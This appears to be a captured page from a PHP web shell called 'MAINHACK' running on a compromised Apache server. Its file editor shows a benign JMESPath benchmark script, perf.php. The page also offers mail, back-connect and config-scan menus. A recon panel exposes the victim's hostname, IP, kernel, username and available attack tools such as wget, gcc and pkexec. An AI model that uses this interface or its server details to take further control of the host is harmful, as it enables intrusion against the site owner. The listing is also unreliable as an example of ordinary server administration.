[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: perf.php
#!/usr/bin/env php <?php if (file_exists(__DIR__ . '/../vendor/autoload.php')) { require __DIR__ . '/../vendor/autoload.php'; } elseif (file_exists(__DIR__ . '/../../../autoload.php')) { require __DIR__ . '/../../../autoload.php'; } else { throw new RuntimeException('Unable to locate autoload.php file.'); } $xdebug = new \Composer\XdebugHandler\XdebugHandler('perf.php'); $xdebug->check(); unset($xdebug); $dir = isset($argv[1]) ? $argv[1] : __DIR__ . '/../tests/compliance/perf'; is_dir($dir) or die('Dir not found: ' . $dir); // Warm up the runner \JmesPath\Env::search('foo', []); $total = 0; foreach (glob($dir . '/*.json') as $file) { $total += runSuite($file); } echo "\nTotal time: {$total}\n"; function runSuite($file) { $contents = file_get_contents($file); $json = json_decode($contents, true); $total = 0; foreach ($json as $suite) { foreach ($suite['cases'] as $case) { $total += runCase( $suite['given'], $case['expression'], $case['name'] ); } } return $total; } function runCase($given, $expression, $name) { $best = 99999; $runtime = \JmesPath\Env::createRuntime(); for ($i = 0; $i < 100; $i++) { $t = microtime(true); $runtime($expression, $given); $tryTime = (microtime(true) - $t) * 1000; if ($tryTime < $best) { $best = $tryTime; } if (!getenv('CACHE')) { $runtime = \JmesPath\Env::createRuntime(); // Delete compiled scripts if not caching. if ($runtime instanceof \JmesPath\CompilerRuntime) { array_map('unlink', glob(sys_get_temp_dir() . '/jmespath_*.php')); } } } printf("time: %07.4fms name: %s\n", $best, $name); return $best; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002